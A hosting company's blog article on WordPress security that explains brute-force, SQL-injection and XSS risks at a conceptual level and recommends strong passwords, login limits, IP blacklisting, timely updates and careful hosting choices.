WordPress: Its Biggest Strength is also its Biggest Weakness

Tobias Schüring Last updated 21.01.2020
8 Min.
How safe is WordPress

How secure is WordPress ? Not particularly, because it comes with a number of serious vulnerabilities. And because more than 28 percent of the Internet currently runs WordPress , it is a popular target for attack. The good news: The most important vulnerabilities can be very easily eliminated.

The beauty of WordPress is that anyone can use it. In fact, all you need is an Internet connection and you're ready to go. The situation is quite different with WordPress security. Maybe also just because of not all users are concerned with how secure WordPress actually is out of the box.

In any case, because of its great strengths - the incredible range of functions and the diverse designs - WordPress tends to be very insecure. The modular structure offers massive points of attack. And of course, hackers also exploit these. And they do so automatically, around the clock, 365 days a year.

But don't worry: These built-in weaknesses of WordPress can be very easily eliminated. And first of all completely without additional securityPlugin.

Of course, I don't want to talk you out of your security plugin. In fact, it makes a lot of sense in some circumstances. But securing your WordPress site is not finished with its installation. And before you get into shadowboxing fights with pseudo threats, it makes more sense to compensate for the basic weaknesses of WordPress .

In detail, today we are dealing with

"But my site isn't interesting to hackers at all"

Make no mistake: this assumption is simply wrong. Every WordPress site is valuable for attackers. For example, as a spam spinner, part of a botnet, or an advertising platform for phishingsites .

And in case of doubt, the attacker does not care how small, new or little visited your site is. Because in the end, you and your business are the ones who suffer. So it can happen that your newsletter is classified as spam, users are warned against visiting your site and your Google ranking suffers because your site is on a blacklist.

What I'm saying is that simply because of the popularity and prevalence of WordPress . WordPress sites is a prime target for attack. And that is regardless of their content and purpose.

The WP admin area is particularly vulnerable

The loginsite is accessible by default via the suffix "wp-admin". This is why it is also the target of particularly frequent attacks - e.g. so-called Brute Force attacks. These attacks are among the most frequent hacks against WordPress sites . This is because they are very easy to automate. In a Brute Force attack, the attacker basically tries to guess the right combination of username and password. So if the password is weak, or the login area is not protected, a Brute Force attack can either succeed - and the attacker can successfully log into your WP - or the massive amount of login attempts can cripple your site .

Wordfence, the well-known manufacturer of the eponymous securityPlugins, recorded an average of 34 million Brute Force attacks in March alone - and that is daily. In comparison, the so-called "complex attacks", i.e. those that exploit specific security vulnerabilities, are at a level of 3.8 million attacks daily.

Statistics on Brute Force attacks counted by Wordfence in March 2017
March report from Wordfence shows: The plugin manufacturer was able to record an average of about 34 million Brute Force attacks per day. There were particularly many in the middle of the month.

However, since Wordfence only counts attacks that were blocked by its own software, the number of unreported cases is even higher.

But the good news is: Although the attack on the WP admin area is very easy and can be automated quickly, the protective measures against it are very simple. To secure your WP admin area, you can put up protective walls in three places:

  1. At WP level, through strong passwords
  2. At the login itself, by limiting the number of login attempts
  3. Before login, through a blacklist

1) The old chestnut: strong passwords

Brute Force attacks are very mindless attacks. They basically just guess. That's why a strong password here can actually be enough to make the attacks go nowhere. So let's make it short: The strong password is mandatory. This includes: Letters, numbers, special characters, and upper and lower case letters. And of course, two-way authentication also makes sense.

TIP: By the way, password managers make it easy not only to create secure passwords, but also to manage them. Apple computers offer with the program "keychain management" for example a convenient way to manage your passwords offline. You only have to remember one master password (which should be as complex as possible, of course). Cloud-based password management programs such as 1Password, LastPass or X-Key Pass work in the same way.

2) Limit the number of logins

You can see it impressively in the figures of Wordfence : Brute Force attacks are the most frequent attacks on WordPress sites . So the probability that your site becomes a victim of such an attack is very high. And so that the high number of login attempts does not burden your site unnecessarily, there is the possibility to limit them.

For example, an IP is blocked for a certain time after three failed attempts. If it then breaks the limit again, the blocking period increases successively. In this way, you very quickly limit the number of possible attempts to such an extent that the attack becomes useless.

Depending on how low the blocking threshold is set, this procedure can also protect against an attack with changing IPs. The easiest way to protect your login area is to use Plugins . Here you can find for example WP Limit Login Attempts, Login Lockdown or one of the big security plugins like Sucuri, Wordfence or All in One WP Security. The sites of RAIDBOXES customers are already equipped with a server-side Brute Force protection. An additional Plugin is therefore not necessary here.

3) Blacklisting

The employees of security companies such as Sucuri or Wordfence spend large parts of their working time analysing attacks. They also publish these analyses at regular intervals. One of the most important aspects in these reports is regularly the origin of an IP. This is because certain countries are home to servers that are particularly prone to attacks.

Blacklisting the corresponding IPs therefore makes perfect sense. Especially if the region is not relevant to your target group. This way you can effectively fight back attacks before they reach your site .

You can either create such blacklists yourself by implementing them at the server level, or you can use a securityPlugin with a corresponding function.

Deprecated WordPress

WordPress is a modular system. It consists of the core, i.e. the core software, the Plugins and the Themes. One of the biggest dangers for WP installations arises from the fact that many users do not regularly update their WordPress system.

This has the most different reasons. These range from incompatibilities at Plugins and Themes, to ignorance or lack of time for an update.

how secure is wordpress - more than 70 percent of all wordpress sites  are not running the current version
This statistic from WordPress .org shows that 72.5 percent of all WordPress installations are currently not running the latest WP version. Almost 40 percent are running even older versions than 4.7.

Where delayed core updates can lead to was demonstrated quite impressively at the beginning of the year: In February 2017, a security vulnerability in the WordPress version 4.7.1 became known, and WordPress users were called upon to update to version 4.7.2 as quickly as possible.

Within a very short time, the announcement provoked mass attacks on WordPress sites (because the gap was not yet known before the official announcement). The manufacturers of the corresponding security software again provide figures for this: within just a few days, a total of one and a half to two million were hacked. two million sites were hacked. Previously, an employee of Wordfence had discovered the security vulnerability.

If one recalls that currently more than 28 percent of the entire Internet is based on WordPress , you can get a pretty good idea of what could happen if such a vulnerability were to go unnoticed. It is therefore advisable to automate the updates of the WordPress core or have them automated.

By the way, this mainly applies to the so-called minor updates, i.e. version numbers with three digits, e.g. 4.7.4. These are the so-called "security and maintenance releases" and should always be installed as soon as possible. For larger version jumps, e.g. from 4.7 to 4.8, the situation is somewhat different: Here, the focus of the updates is on functions and user guidance.

Obsolete Plugins and Themes

What is true for the WordPress core is of course also true for the Plugins and Themes: Outdated Plugin versions almost always contain security vulnerabilities - and avoidable ones at that.

According to a security study on content management systems, the German Federal Office for Information Security (BSI) has a similar view. The BSI data refers to the period from 2010 to 2012. 80 percent of the officially reported vulnerabilities could be traced back to extensions - i.e. in most cases to Plugins.

A search for exploits using ExploitsDatabase returned over 250 exploits for WordPress . The majority of exploits for WordPress Plugins have been entered here.

- BSI (2013): "Security Study Content Management Systems (CMS)".

In practice, Plugins is a favorite attack point for hackers. And with more than 50,000 extensions in the official plugin directory of WordPress , also a very productive. Starting point for such attacks are then gaps in the code of Plugins.

Here it is important to understand: Such gaps will always exist. A 100 percent secure system simply does not exist. And: Missing updates at Plugin or Theme do not automatically mean that it is insecure. Even if the update frequency is a good indicator for the support quality of a manufacturer. But it could just as well be that no security vulnerabilities have been discovered so far.

But if any are discovered, then the plugin provider will (hopefully) also provide an update that closes the gap. If they do not, SQL injections or cross site scripting (XSS) are possible. With the former, hackers manipulate the database of your site . In this way, they can, for example, create completely new users with admin rights and then infect your site with malicious code or even convert it into a spam spinner.

XSS attacks are basically about placing JavaScript on your site . This way, an attacker can, for example, inject forms on your site that steal the user's data. Completely unobtrusive, SSL encrypted and in a trusted environment.

And because Plugins and Themes offer so many points of attack, you should always pay attention to the number of Plugins and make sure not to leave them in a deactivated state, but really uninstall them when you don't need them anymore.

shared hosting

These disadvantages are already inherent in WordPress . But since your site has to come online somehow, hosting is also an important security aspect. Since security and hosting is a very complex and multifaceted topic, I would like to talk at this point only about the big disadvantage of shared hosting. Again, this doesn't mean I'm talking you out of shared hosting. It makes a lot of sense, especially from a price perspective. But shared hosting comes with one major disadvantage that you should be aware of.

With shared hosting, several sites are located on one and the same server. The sites also share the IP address. This means that the state and behavior of one site can also negatively influence all other sites on the server. This effect is called the Bad Neighbor Effect and refers to spamming, for example. If a site on your server causes the IP to be blacklisted, this can also affect your offer.

In addition, it can lead to an overuse of resources, for example, if one of the sites on the server is involved in a DDoS attack or is affected by a massive attack. The stability of your own offer is therefore to a certain extent always dependent on the security of the other sites on your server.

For professionally operated WP-WordPress projects, a virtual or dedicated server makes perfect sense. Of course, the security concepts of hosters also include backup solutions, firewalls and malware scanners, but we will discuss these in detail elsewhere.

Final thoughts

WordPress is insecure. And this is due to its modular structure. Its greatest strength can therefore become its greatest weakness. The good news is that you can easily work around this weakness. More than the effort in user management and password creation as well as in updates is basically not needed.

Of course, these measures do not turn your site into Fort Knox. But they are the cornerstone of your security concept. Because if you do not observe them, they can undermine all other security measures. And every WordPress user can influence these aspects on his own. That is why it is so important that you are always aware of them.

As a system administrator, Tobias watches over our infrastructure and finds every possible way to optimize the performance of our servers. His tireless efforts mean he can often be found on Slack in the early hours.

Related articles

Comments on this article

Post a comment

Your email address will not be published. Required fields are marked with *.